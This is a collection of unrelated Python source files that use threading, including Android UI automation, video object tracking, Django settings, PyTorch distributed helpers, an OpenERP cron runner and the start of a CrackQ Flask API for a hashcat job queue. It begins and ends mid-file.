set(dangling[0]) if processes: need_sleep = True print('Warning -- Dangling processes: %s' % processes, file=sys.stderr) processes = None threads = set(threading._dangling) - set(dangling[1]) if threads: need_sleep = True print('Warning -- Dangling threads: %s' % threads, file=sys.stderr) threads = None # Sleep 500 ms to give time to child processes to complete. if need_sleep: time.sleep(0.5) multiprocess.process._cleanup() support.gc_collect() remote_globs['setUpModule'] = setUpModule remote_globs['tearDownModule'] = tearDownModule
action.py
from threading import Thread from uiautomator import device as d from ctx.generators.util import Adb class Actuator: def execute_in_background(self, recipe): thread = Thread(target=self.execute, args=(recipe,)) thread.start() def execute(self, recipe): for action in recipe['action']: if action['id'] == 'Facebook': self.do_facebook(action, recipe['variables']) elif action['id'] == 'Calendar': self.do_agenda(action, recipe['variables']) elif action['id'] == 'Email': self.do_email(action, recipe['variables']) def do_email(self, action, variables): d.screen.on() d.press.home() Adb.start("com.google.android.gm/com.google.android.gm.ComposeActivityGmail") d(resourceId="com.google.android.gm:id/to").click() Adb.write(action['value']) d.press.enter() d(resourceId="com.google.android.gm:id/subject").click() Adb.write(self.get_var("$titulo", variables)) d(resourceId="com.google.android.gm:id/body").click() Adb.write(self.get_var("$mensagem", variables)) d(resourceId="com.google.android.gm:id/send").click() def do_agenda(self, action, variables): pass def do_facebook(self, action, variables): contact = action["value"] d.screen.on() d.press.home() Adb.start("com.facebook.orca/.auth.StartScreenActivity") d(resourceId="com.facebook.orca:id/action_search").click() Adb.write(contact) d(className="android.widget.ListView").child(index=1).click() d(resourceId="com.facebook.orca:id/edit_text").click() Adb.write(self.get_var("$mensagem", variables)) d(description="Enviar").click() @staticmethod def get_var(var_name, variables): return next(filter(lambda var: var['name'] == var_name, variables))['value']
test-html.py
from seamless.highlevel import Context ctx = Context() ctx.a = "<b>Hello world!</b>" ctx.a.celltype = "text" ctx.a.mimetype = "html" ctx.a.mount("/tmp/a.html") ctx.a.share() ctx.translate() import asyncio import requests loop = asyncio.get_event_loop() loop.run_until_complete(asyncio.sleep(1)) def thread(func, *args, **kwargs): from threading import Thread from queue import Queue def func2(func, q, args, kwargs): result = func(*args, **kwargs) q.put(result) q = Queue() t = Thread(target=func2, args=(func, q, args, kwargs)) t.start() while t.is_alive(): t.join(0.05) loop.run_until_complete(asyncio.sleep(0.01)) return q.get() r = thread(requests.get, 'http://localhost:5813/ctx/a') print(r.text)
offline_tracking.py
import mmcv import numpy as np import os.path as osp import cv2 import matplotlib.pyplot as plt import random import argparse import cv2 import torch from torch.utils.data import Dataset import numpy as np # from tensorboardX import SummaryWritter from pysot.core.config import cfg from pysot.models.model_builder import ModelBuilder from pysot.tracker.tracker_builder import build_tracker import datetime import time import pickle from multiprocessing import Pool from torch import multiprocessing _TIMESTAMP_BIAS = 600 _TIMESTAMP_START = 840 # 60*14min _TIMESTAMP_END = 1860 # 60*31min _FPS = 30 torch.set_num_threads(0) parser = argparse.ArgumentParser(description='tracking demo') parser.add_argument('--config', type=str, help='config file') parser.add_argument('--snapshot', type=str, help='model name') parser.add_argument('--video_name', default='', type=str, help='videos or image files') args = parser.parse_args() cfg.merge_from_file(args.config) cfg.CUDA = True # device = torch.device('cuda') # random.seed(1) # Firstly Load Proposal random.seed(0) np.random.seed(0) torch.manual_seed(0) torch.cuda.manual_seed(0) torch.backends.cudnn.deterministic = True torch.backends.cudnn.benchmark = False class Tracking_Proposal(object): def __init__(self, img_prefix, proposal_path, video_stat_file, new_length=32, new_step=2, with_pysot=True, with_shuffle=False, num_gpus=1, num_workers=1): self.img_prefix = img_prefix self.new_step = new_step self.new_length = new_length self.proposal_dict, self.org_proposal_dict = self.load_proposal(proposal_path) self.video_stats = dict([tuple(x.strip().split(' ')) for x in open(video_stat_file)]) self.with_model = False self.with_pysot = with_pysot self.with_shuffle = with_shuffle self.result_dict = {} self.num_gpus = num_gpus self.num_workers = num_workers def load_proposal(self, path): proposal_dict = mmcv.load(path) convert_dict = {} for key, value in proposal_dict.items(): video_id, frame = key.split(',') if convert_dict.get(video_id,None) is None: convert_dict[video_id] = {} elif convert_dict[video_id].get(frame, None) is None: convert_dict[video_id][frame] = {} convert_dict[video_id][frame] = value return convert_dict, proposal_dict def _load_image(self, directory, image_tmpl, modality, idx): if modality in ['RGB', 'RGBDiff']: return mmcv.imread(osp.join(directory, image_tmpl.format(idx))) elif modality == 'Flow': x_imgs = mmcv.imread( osp.join(directory, image_tmpl.format('x', idx)), flag='grayscale') y_imgs = mmcv.imread( osp.join(directory, image_tmpl.format('y', idx)), flag='grayscale') return [x_imgs, y_imgs] else: raise ValueError( 'Not implemented yet; modality should be ' '["RGB", "RGBDiff", "Flow"]') def spilit_proposal_dict(self): keys = list(self.proposal_dict.keys()) if self.with_shuffle: random.shuffle(keys) shuffle_dict = [(key, self.proposal_dict[key]) for key in keys] video_per_gpu = int(len(shuffle_dict) // (self.num_gpus*self.num_workers)) self.sub_shuffle_dict_list = [shuffle_dict[i * video_per_gpu:(i + 1) * video_per_gpu] if i != self.num_gpus - 1 else shuffle_dict[i * video_per_gpu:] for i in range(self.num_gpus*self.num_workers)] self.shuffle_dict = shuffle_dict def spilit_org_proposal_dict(self): keys = list(self.org_proposal_dict.keys()) if self.with_shuffle: random.shuffle(keys) shuffle_dict = [(key, self.org_proposal_dict[key]) for key in keys if True or '-5KQ66BBWC' in key and 900<=int(key[-4:])<=950] video_per_gpu = int(len(shuffle_dict) // (self.num_gpus*self.num_workers)) self.sub_shuffle_dict_list = [shuffle_dict[i * video_per_gpu:(i + 1) * video_per_gpu] if i != (self.num_gpus*self.num_workers) - 1 else shuffle_dict[i * video_per_gpu:] for i in range(self.num_gpus*self.num_workers)] # [print((i*video_per_gpu,(i+1)*video_per_gpu)) if i != (self.num_gpus*self.num_workers-1) else print(i*video_per_gpu,len(shuffle_dict)) for i in range(self.num_gpus*self.num_workers)] self.shuffle_dict = shuffle_dict def tracking(self, index): # self.spilit_dict() self.index = index self.spilit_org_proposal_dict() if self.with_pysot: self.init_tracker() # for video_id, frame_info in self.sub_shuffle_dict_list[index]: # cnt = 0 len_proposal = sum([len(proposals) for frame_info,proposals in self.sub_shuffle_dict_list[index]]) print("Process:{},proposal lenght:{}".format(self.index, len_proposal)) cnt_time = 0 cnt_proposal = 0 begin = time.time() cnt = 0 for id_frame, (frame_info, proposals) in enumerate(self.sub_shuffle_dict_list[index]): video_id, timestamp = frame_info.split(',') indice = _FPS * (int(timestamp) - _TIMESTAMP_START) + 1 image_tmpl = 'img_{:05}.jpg' # forward tracking self.result_dict[frame_info] = [] for ik, proposal in enumerate(proposals): new_proposals = [] # begin = time.time() # if ik != 9: # continue width, height = [int(ll) for ll in self.video_stats[video_id].split('x')] ROI = np.array([int(x) for x in (proposal * np.array([ width, height, width, height, 1 ]))[:4]]) track_window = tuple(np.concatenate([ROI[:2],ROI[-2:]-ROI[:2]],axis=0).tolist()) ann_frame = self._load_image(osp.join(self.img_prefix, video_id), image_tmpl, 'RGB', indice) if False or frame_info == '-5KQ66BBWC4,0934' and False: plt.imshow(ann_frame[:,:,::-1]) color = (random.random(), random.random(), random.random()) rect = plt.Rectangle((track_window[0],track_window[1]), track_window[2], track_window[3], fill=False, edgecolor=color, linewidth=5) plt.gca().add_patch(rect) plt.show() self.init_frame(ann_frame, track_window) # Forcasting Tracking p = indice - self.new_step for i, ind in enumerate( range(-2, -(self.new_length+1), -self.new_step)): unann_frame = self._load_image(osp.join(self.img_prefix, video_id), image_tmpl, 'RGB', p) if self.with_pysot: track_window = self.pysot_tracking_roi(track_window, key_frame=ann_frame, tracked_frame=unann_frame, vis= frame_info == '-5KQ66BBWC4,0934' and False) else: track_window = self.cv2_tracking_roi(track_window, org_frame=ann_frame, tracked_frame=unann_frame) new_proposals = [np.array(track_window) / np.array([width, height, width, height])] + new_proposals # self.result_dict['{},{},{},{}'.format(video_id, '{:04d}'.format(int(timestamp)), ik, ind)] = np.array(track_window) / np.array([width, height, width, height]) ann_frame = unann_frame.copy() p -= self.new_step if frame_info == '-5KQ66BBWC4,0934' and False: print(self.index, np.array(ROI) / np.array([width, height, width, height]), np.array(track_window) / np.array([width, height, width, height])) track_window = tuple(np.concatenate([ROI[:2], ROI[-2:] - ROI[:2]], axis=0).tolist()) ann_frame = self._load_image(osp.join(self.img_prefix, video_id), image_tmpl, 'RGB', indice) # self.result_dict['{},{},{},{}'.format(video_id, '{:04d}'.format(int(timestamp)), proposal, new_proposals.append(np.array(ROI) / np.array([width, height, width, height])) # Backcasting Tracking p = indice + self.new_step for i, ind in enumerate( range(0, self.new_length-2, self.new_step)): unann_frame = self._load_image(osp.join(self.img_prefix, video_id), image_tmpl, 'RGB', p) if self.with_pysot: track_window = self.pysot_tracking_roi(track_window, key_frame=ann_frame, tracked_frame=unann_frame, vis=frame_info == '-5KQ66BBWC4,0934' and False) else: track_window = self.cv2_tracking_roi(track_window, org_frame=ann_frame, tracked_frame=unann_frame) new_proposals += [np.array(track_window) / np.array([width, height, width, height])] #self.result_dict['{},{},{},{}'.format(video_id, '{:04d}'.format(int(timestamp)), ik, ind+2)] =np.array(track_window) / np.array([width, height, width, height]) ann_frame = unann_frame p += self.new_step end = time.time() cnt_time +=(end-begin) cnt_proposal += 1 avg_time = (end-begin)/cnt_proposal left_time = (len_proposal-cnt_proposal)*avg_time # print(left_time) self.result_dict[frame_info].append((new_proposals, proposal[-1])) if cnt_proposal % 10== 0: print('Process:{}, length_process:{}/{}, video_id:{}, frame:{}, proposal_id:{}th, proposal_len:{}, per_cost_time:{} , left_time:{}'.format(self.index, cnt_proposal, len_proposal, video_id, timestamp, ik, len(proposals), avg_time, datetime.timedelta(seconds=int(left_time)))) # print('cnt->>>{}!!!!'.format(cnt)) # cnt += 1 # if cnt >= 1: # break # break def build_model(self): model = ModelBuilder() # load model model.load_state_dict(torch.load(args.snapshot, map_location=lambda storage, loc: storage.cpu())) # import ipdb # ipdb.set_trace() device = torch.device('cuda:{}'.format(int(self.index//self.num_workers)) if cfg.CUDA else 'cpu') print(device) model.eval().to(device) # build tracker tracker = build_tracker(model) return tracker def init_tracker(self): self.tracking_model = self.build_model() def init_frame(self, frame, track_window): self.tracking_model.init(frame, track_window) def pysot_tracking_roi(self, track_window, key_frame, tracked_frame, vis=False or True): outputs = self.tracking_model.track(tracked_frame) # import ipdb # ipdb.set_trace() if 'polygon' in outputs: cv2.polylines(tracked_frame, [polygon.reshape((-1, 1, 2))], True, (0, 255, 0), 3) mask = ((outputs['mask'] > cfg.TRACK.MASK_THERSHOLD) * 255) mask = mask.astype(np.uint8) mask = np.stack([mask, mask * 255, mask]).transpose(1, 2, 0) tracked_frame = cv2.addWeighted(tracked_frame, 0.77, mask, 0.23, -1) else: bbox = list(map(int, outputs['bbox'])) cv2.rectangle(tracked_frame, (bbox[0], bbox[1]), (bbox[0] + bbox[2], bbox[1] + bbox[3]), (0, 255, 0), 1) bbox = list(map(int, outputs['bbox'])) bbox = [bbox[0],bbox[1], bbox[0]+bbox[2], bbox[1]+bbox[3]] if vis: plt.imshow(tracked_frame[:,:,::-1]) plt.show() return bbox def cv2_tracking_roi(self, track_window, org_frame, tracked_frame, vis=True): x, y, w, h = track_window roi = org_frame[y:y+h, x:x+w] hsv_roi = cv2.cvtColor(roi, cv2.COLOR_BGR2HSV) mask = cv2.inRange(hsv_roi, np.array((0., 0.,0.)), np.array((180.,255.,255.))) roi_hist = cv2.calcHist([hsv_roi],[0],mask,[180],[0,180]) cv2.normalize(roi_hist,roi_hist,0,255,cv2.NORM_MINMAX) term_crit = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 1) hsv = cv2.cvtColor(tracked_frame, cv2.COLOR_BGR2HSV) dst = cv2.calcBackProject([hsv], [0], roi_hist, [0, 180], 1) # apply meanshift to get the new location ret, track_window = cv2.meanShift(dst, track_window, term_crit) if vis: # Draw it on image # pts = cv2.boxPoints(ret) # pts = np.int0(pts) # img2 = cv2.polylines(tracked_frame, [pts], True, 255, 2) x, y, w, h = track_window img2 = cv2.rectangle(tracked_frame, (x, y), (x + w, y + h), 255, 1) plt.imshow(img2[:,:,::-1]) plt.show() return track_window def save_result(self, d_type): with open('./pkl_results/{}_results_dict_{}.pkl'.format(d_type,self.index),'wb') as f: pickle.dump(self.result_dict, f) data_root = '/home/yhxu/code/mmaction/data/ava/rawframes/' d_type='train' def multi_track(index): tracking_inst = Tracking_Proposal( img_prefix=data_root, proposal_path='/home/yhxu/code/mmaction/data/ava/ava_dense_proposals_{}.FAIR.recall_93.9.pkl'.format(d_type), video_stat_file='/home/yhxu/code/mmaction/data/ava/ava_video_resolution_stats.csv', new_length=32, new_step=2, with_shuffle=False, num_gpus=8, num_workers=4, ) tracking_inst.tracking(index) tracking_inst.save_result(d_type) if __name__ == '__main__': ctx = multiprocessing.get_context('spawn') workers = [ctx.Process(target=multi_track,args=(rank,)) for rank in range(32)] index_queue = ctx.Queue() result_queue = ctx.Queue() for w in workers: w.daemon = True w.start() print('end->>!!!') for i in range(1000): index_queue.put(i) for i in range(1000): idx, res = result_queue.get() # multi_track(0) # multiprocessing.set_start_method('spawn') # pool = multiprocessing.Pool(processes=8) # results = [] # for rank in range(32): # results.append(pool.apply_async(multi_track, (rank,))) # # rst = [result.get() for result in results] # import ipdb # ipdb.set_trace() #s # processes = [] # for rank in range(8): # p = multiprocessing.Process(target=multi_track,args=(rank,)) # p.start() # processes.append(p) # # for p in processes: # p.join() # # import ipdb # ipdb.set_trace() #import ipdb #ipdb.set_trace() # for # # rst = result_queue.get() # # print('saving_results')
pump_ui.py
import logging import threading import ipywidgets as ipw logger = logging.getLogger(__name__) class PumpUI(object): def __init__(self, proxy): self.proxy = proxy def _pump_frequency(message): proxy.pump_frequency_set(message['new']) pump_frequency = ipw.FloatSlider(description='Frequency (Hz):', min=1, max=1e4, value=1e3) pump_frequency.observe(_pump_frequency, names=['value']) pump_duration = ipw.FloatSlider(description='Duration (s):', min=0, max=120., value=3.) def _pump_trigger(*args): cancel = threading.Event() def _cancel_pump(*args): cancel.set() pump_cancel.on_click(_cancel_pump) def _pump(): _disable_widgets() proxy.pump_activate() try: if cancel.wait(pump_duration.value): logger.warning('Pump action was cancelled.') else: logger.info('Pump action completed.') finally: proxy.pump_deactivate() _enable_widgets() thread = threading.Thread(target=_pump) thread.daemon = True thread.start() pump_trigger = ipw.Button(description='Pump') pump_trigger.on_click(_pump_trigger) pump_cancel = ipw.Button(description='Cancel') widget = ipw.VBox([pump_frequency, pump_duration, pump_trigger, pump_cancel]) def _enable_widgets(): for widget_i in widget.children: widget_i.disabled = False def _disable_widgets(): for widget_i in [pump_duration, pump_trigger]: widget_i.disabled = True self.widget = widget
settings_20210906111618.py
""" Django settings for First_Wish project. Generated by 'django-admin startproject' using Django 3.2. For more information on this file, see https://docs.djangoproject.com/en/3.2/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/3.2/ref/settings/ """ from pathlib import Path import os import environ import threading import schedule import time from First_Wish_Main_App.views import decrease_day_count_and_send_bday_mails env_path = os.path.join(os.path.dirname(__file__), '../.env') environ.Env.read_env(env_path) # schedule.every().day.at("11:00").do(decrease_day_count_and_send_bday_mails) # ///////////////////////////////SCHEDULE THE ENABLE BUTTON STARTS//////////////////// # Schedule the task at 00:01 everyday def sayHi(): print("Hi") schedule.every().day.at("11:17").do(sayHi) # schedule.every().day.at("01:00").do(delete_task_and_add_store_datewise) def func(): while True: print("======Runnning==========") schedule.run_pending() time.sleep(5) t1 = threading.Thread(target=func) t1.start() # ///////////////////////////////SCHEDULE THE ENABLE BUTTON ENDS//////////////////// # Build paths inside the project like this: BASE_DIR / 'subdir'. BASE_DIR = Path(__file__).resolve().parent.parent templates_path=os.path.join(BASE_DIR,'templates') # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY =os.environ.get('DJANGO_SECRET_KEY') # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ 'First_Wish_Main_App', 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'First_Wish.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [templates_path], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'First_Wish.wsgi.application' # Database # https://docs.djangoproject.com/en/3.2/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': BASE_DIR / 'db.sqlite3', } } # Password validation # https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/3.2/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'Asia/Kolkata' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/3.2/howto/static-files/ STATIC_URL = '/static/' # Default primary key field type # https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField' STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles') STATICFILES_DIRS = [ os.path.join(BASE_DIR, "static"), ]
distributed.py
#!/usr/bin/env python3 # Copyright (c) Facebook, Inc. and its affiliates. # # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. """Distributed helpers.""" import multiprocessing import os import random import signal import threading import traceback import torch from pycls.core.config import cfg # Make work w recent PyTorch versions (https://github.com/pytorch/pytorch/issues/37377) os.environ["MKL_THREADING_LAYER"] = "GNU" def is_master_proc(): """Determines if the current process is the master process. Master process is responsible for logging, writing and loading checkpoints. In the multi GPU setting, we assign the master role to the rank 0 process. When training using a single GPU, there is a single process which is considered master. """ return cfg.NUM_GPUS == 1 or torch.distributed.get_rank() == 0 def init_process_group(proc_rank, world_size, port): """Initializes the default process group.""" # Set the GPU to use torch.cuda.set_device(proc_rank) # Initialize the process group torch.distributed.init_process_group( backend=cfg.DIST_BACKEND, init_method="tcp://{}:{}".format(cfg.HOST, port), world_size=world_size, rank=proc_rank, ) def destroy_process_group(): """Destroys the default process group.""" torch.distributed.destroy_process_group() def scaled_all_reduce(tensors): """Performs the scaled all_reduce operation on the provided tensors. The input tensors are modified in-place. Currently supports only the sum reduction operator. The reduced values are scaled by the inverse size of the process group (equivalent to cfg.NUM_GPUS). """ # There is no need for reduction in the single-proc case if cfg.NUM_GPUS == 1: return tensors # Queue the reductions reductions = [] for tensor in tensors: reduction = torch.distributed.all_reduce(tensor, async_op=True) reductions.append(reduction) # Wait for reductions to finish for reduction in reductions: reduction.wait() # Scale the results for tensor in tensors: tensor.mul_(1.0 / cfg.NUM_GPUS) return tensors class ChildException(Exception): """Wraps an exception from a child process.""" def __init__(self, child_trace): super(ChildException, self).__init__(child_trace) class ErrorHandler(object): """Multiprocessing error handler (based on fairseq's). Listens for errors in child processes and propagates the tracebacks to the parent. """ def __init__(self, error_queue): # Shared error queue self.error_queue = error_queue # Children processes sharing the error queue self.children_pids = [] # Start a thread listening to errors self.error_listener = threading.Thread(target=self.listen, daemon=True) self.error_listener.start() # Register the signal handler signal.signal(signal.SIGUSR1, self.signal_handler) def add_child(self, pid): """Registers a child process.""" self.children_pids.append(pid) def listen(self): """Listens for errors in the error queue.""" # Wait until there is an error in the queue child_trace = self.error_queue.get() # Put the error back for the signal handler self.error_queue.put(child_trace) # Invoke the signal handler os.kill(os.getpid(), signal.SIGUSR1) def signal_handler(self, _sig_num, _stack_frame): """Signal handler.""" # Kill children processes for pid in self.children_pids: os.kill(pid, signal.SIGINT) # Propagate the error from the child process raise ChildException(self.error_queue.get()) def run(proc_rank, world_size, port, error_queue, fun, fun_args, fun_kwargs): """Runs a function from a child process.""" try: # Initialize the process group init_process_group(proc_rank, world_size, port) # Run the function fun(*fun_args, **fun_kwargs) except KeyboardInterrupt: # Killed by the parent process pass except Exception: # Propagate exception to the parent process error_queue.put(traceback.format_exc()) finally: # Destroy the process group destroy_process_group() def multi_proc_run(num_proc, fun, fun_args=(), fun_kwargs=None): """Runs a function in a multi-proc setting (unless num_proc == 1).""" # There is no need for multi-proc in the single-proc case fun_kwargs = fun_kwargs if fun_kwargs else {} if num_proc == 1: fun(*fun_args, **fun_kwargs) return # Handle errors from training subprocesses error_queue = multiprocessing.SimpleQueue() error_handler = ErrorHandler(error_queue) # Get a random port to use (without using global random number generator) port = random.Random().randint(cfg.PORT_RANGE[0], cfg.PORT_RANGE[1]) # Run each training subprocess ps = [] for i in range(num_proc): p_i = multiprocessing.Process( target=run, args=(i, num_proc, port, error_queue, fun, fun_args, fun_kwargs) ) ps.append(p_i) p_i.start() error_handler.add_child(p_i.pid) # Wait for each subprocess to finish for p in ps: p.join()
cron.py
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2011 OpenERP SA (<http://www.openerp.com>) # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## """ Cron jobs scheduling Cron jobs are defined in the ir_cron table/model. This module deals with all cron jobs, for all databases of a single OpenERP server instance. """ import logging import threading import time from datetime import datetime import openerp _logger = logging.getLogger(__name__) SLEEP_INTERVAL = 60 # 1 min def cron_runner(number): while True: time.sleep(SLEEP_INTERVAL + number) # Steve Reich timing style registries = openerp.modules.registry.RegistryManager.registries _logger.debug('cron%d polling for jobs', number) for db_name, registry in registries.items(): while True and registry.ready: # acquired = openerp.addons.base.ir.ir_cron.ir_cron._acquire_job(db_name) # TODO why isnt openerp.addons.base defined ? import sys base = sys.modules['addons.base'] acquired = base.ir.ir_cron.ir_cron._acquire_job(db_name) if not acquired: break def start_service(): """ Start the above runner function in a daemon thread. The thread is a typical daemon thread: it will never quit and must be terminated when the main process exits - with no consequence (the processing threads it spawns are not marked daemon). """ # Force call to strptime just before starting the cron thread # to prevent time.strptime AttributeError within the thread. # See: http://bugs.python.org/issue7980 datetime.strptime('2012-01-01', '%Y-%m-%d') for i in range(openerp.tools.config['max_cron_threads']): def target(): cron_runner(i) t = threading.Thread(target=target, name="openerp.service.cron.cron%d" % i) t.setDaemon(True) t.start() _logger.debug("cron%d started!" % i) def stop_service(): pass # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
cq_api.py
"""Main Flask code handling REST API""" import json import nltk import os import re import rq import saml2 import threading import time import uuid import crackq from crackq.db import db from crackq.logger import logger from crackq.models import User from crackq import crackqueue, hash_modes, auth from crackq.validator import FileValidation as valid from crackq.conf import hc_conf from datetime import datetime from flask import ( abort, Flask, jsonify, redirect, request, session) from flask.views import MethodView from flask_bcrypt import Bcrypt from flask_seasurf import SeaSurf from flask_login import ( LoginManager, login_required, login_user, logout_user, current_user) from functools import wraps from marshmallow import Schema, fields, validate, ValidationError from marshmallow.validate import Length, Range from operator import itemgetter from pathlib import Path from pypal import pypal from redis import Redis from rq import Queue from rq.serializers import JSONSerializer from saml2 import BINDING_HTTP_POST from saml2 import sigver from sqlalchemy.orm import exc # set perms os.umask(0o077) # Setup Flask App login_manager = LoginManager() app = Flask(__name__) csrf = SeaSurf() bcrypt = Bcrypt(app) CRACK_CONF = hc_conf() # Define HTTP messages ERR_INVAL_JID = {'msg': 'Invalid Job ID'} ERR_METH_NOT = {'msg': 'Method not supported'} ERR_BAD_CREDS = {"msg": "Bad username or password"} class StringContains(validate.Regexp): """ Custom validation class to reject any strtings matching supplied regex See validate.Regexp for args/return values """ default_message = 'Invalid input for this field.' def __call__(self, value): if len(self.regex.findall(value)) > 0: raise ValidationError(self._format_error(value)) return value class parse_json_schema(Schema): """ Class to create the schema for parsing received JSON arguments job_details: str string returned from rq.job.description Returns ------ deets_dict: dictionary only the specified job details are returned """ error_messages = { "name": "Invalid input characters", "username": "Invalid input characters", } job_id = fields.UUID(allow_none=False) batch_job = fields.List(fields.Dict(keys=fields.Str(), place=fields.Int(), job_id=fields.UUID())) hash_list = fields.List(fields.String(validate=StringContains( r'[^A-Za-z0-9\*\$\@\/\\\.\:\-\_\+\.]+\~')), allow_none=True, error_messages=error_messages) wordlist = fields.Str(allow_none=True, validate=[StringContains(r'[\W]\-'), Length(min=1, max=60)]) wordlist2 = fields.Str(allow_none=True, validate=[StringContains(r'[\W]\-'), Length(min=1, max=60)]) attack_mode = fields.Int(allow_none=True, validate=Range(min=0, max=9)) rules = fields.List(fields.String(validate=[StringContains(r'[\W]\-'), Length(min=1, max=60)]), allow_none=True) username = fields.Bool(allow_none=True) notify = fields.Bool(allow_none=True) increment = fields.Bool(allow_none=True) disable_brain = fields.Bool(allow_none=True) increment_min = fields.Int(allow_none=True, validate=Range(min=0, max=20)) increment_max = fields.Int(allow_none=True, validate=Range(min=0, max=20)) mask = fields.Str(allow_none=True, validate=StringContains(r'[^aldsu\?0-9a-zA-Z]')) mask_file = fields.List(fields.String(validate=[StringContains(r'[\W]\-'), Length(min=1, max=60)]), allow_none=True) name = fields.Str(allow_none=True, validate=StringContains(r'[\W]'), error_messages=error_messages) hash_mode = fields.Int(allow_none=False, validate=Range(min=0, max=65535)) restore = fields.Int(validate=Range(min=0, max=1000000000000)) user = fields.Str(allow_none=False, validate=StringContains(r'[\W]')) password = fields.Str(allow_none=False, validate=StringContains(r'[^\w\!\@\#\$\%\^\&\*\(\)\-\+\.\,\\\/]')) confirm_password = fields.Str(allow_none=True, validate=[StringContains(r'[^\w\!\@\#\$\%\^\&\*\(\)\-\+\.\,\\\/]'), Length(min=10, max=60)]) new_password = fields.Str(allow_none=True, validate=[StringContains(r'[^\w\!\@\#\$\%\^\&\*\(\)\-\+\.\,\\\/]'), Length(min=10, max=60)]) email = fields.Str(allow_none=False, validate=StringContains(r'[^\w\@\^\-\+\./]')) admin = fields.Bool(allow_none=True) benchmark_all = fields.Bool(allow_none=True) timeout = fields.Int(validate=Range(min=1, max=28800000), allow_none=True) def get_jobdetails(job_details): """ Function to help pull only required information from a specified redis job description string. job_details: str string returned from rq.job.description Returns ------ deets_dict: dictionary only the specified job details are returned """ deets_dict = {} if 'Benchmark' in job_details: deet_match_list = [ 'name', 'benchmark', 'benchmark_all' ] else: deet_match_list = [ 'hash_mode', 'attack_mode', 'mask', 'wordlist', 'wordlist2', 'rules', 'name', 'username', 'increment', 'increment_min', 'increment_max', 'disable_brain', 'brain_check', 'restore'] ###***make this less ugly ###***review stripping here for improvement logger.debug('Parsing job details:\n{}'.format(job_details)) # Process rules list separately as workaround for splitting on comma if '[' in job_details: ###***add mask_file here when updating to allow list of files rules_split = job_details[job_details.rfind('[')+1:job_details.rfind(']')].strip() rules_list = [rule.strip().rstrip("'").lstrip("'") for rule in rules_split.split(',')] else: rules_list = None deets_split = job_details[job_details.rfind('(')+1:job_details.rfind(')')].split(',') for deets in deets_split: deet = deets.split('=')[0].strip(' ') if deet in deet_match_list: deets_dict[deet] = deets.strip().split('=')[1].strip().rstrip("'").lstrip("'") if 'Benchmark' in job_details: return deets_dict if rules_list: rule_names = [] for key, rule in dict(CRACK_CONF['rules']).items(): if rule in rules_list: rule_names.append(key) deets_dict['rules'] = rule_names else: deets_dict['rules'] = None if 'mask' in deets_dict: if deets_dict['mask']: mask = deets_dict['mask'] for key, mask_file in dict(CRACK_CONF['masks']).items(): if mask in mask_file: deets_dict['mask'] = key if 'wordlist' in deets_dict: if deets_dict['wordlist']: wordlist = deets_dict['wordlist'] for key, word in dict(CRACK_CONF['wordlists']).items(): if wordlist in word: deets_dict['wordlist'] = key break else: deets_dict['wordlist'] = None if 'wordlist2' in deets_dict: wordlist = deets_dict['wordlist2'] for key, word in dict(CRACK_CONF['wordlists']).items(): if wordlist in word: deets_dict['wordlist2'] = key break else: deets_dict['wordlist2'] = None return deets_dict def add_jobid(job_id): """Add job_id to job_ids column in user table""" user = User.query.filter_by(username=current_user.username).first() if user.job_ids: logger.debug('Current registered job_ids: {}'.format(user.job_ids)) jobs = json.loads(user.job_ids) else: logger.debug('No job_ids registered with current user') jobs = None logger.debug('Registering new job_id to current user: {}'.format(job_id)) if isinstance(jobs, list): if job_id not in jobs: jobs.append(job_id) else: logger.warning('job_id already registered to user: {}'.format(job_id)) else: jobs = [job_id] user.job_ids = json.dumps(jobs) db.session.commit() logger.debug('user.job_ids: {}'.format(user.job_ids)) def del_jobid(job_id): """Delete job_id from job_ids column in user table""" with crackq.app.app_context(): for user in User.query.all(): if 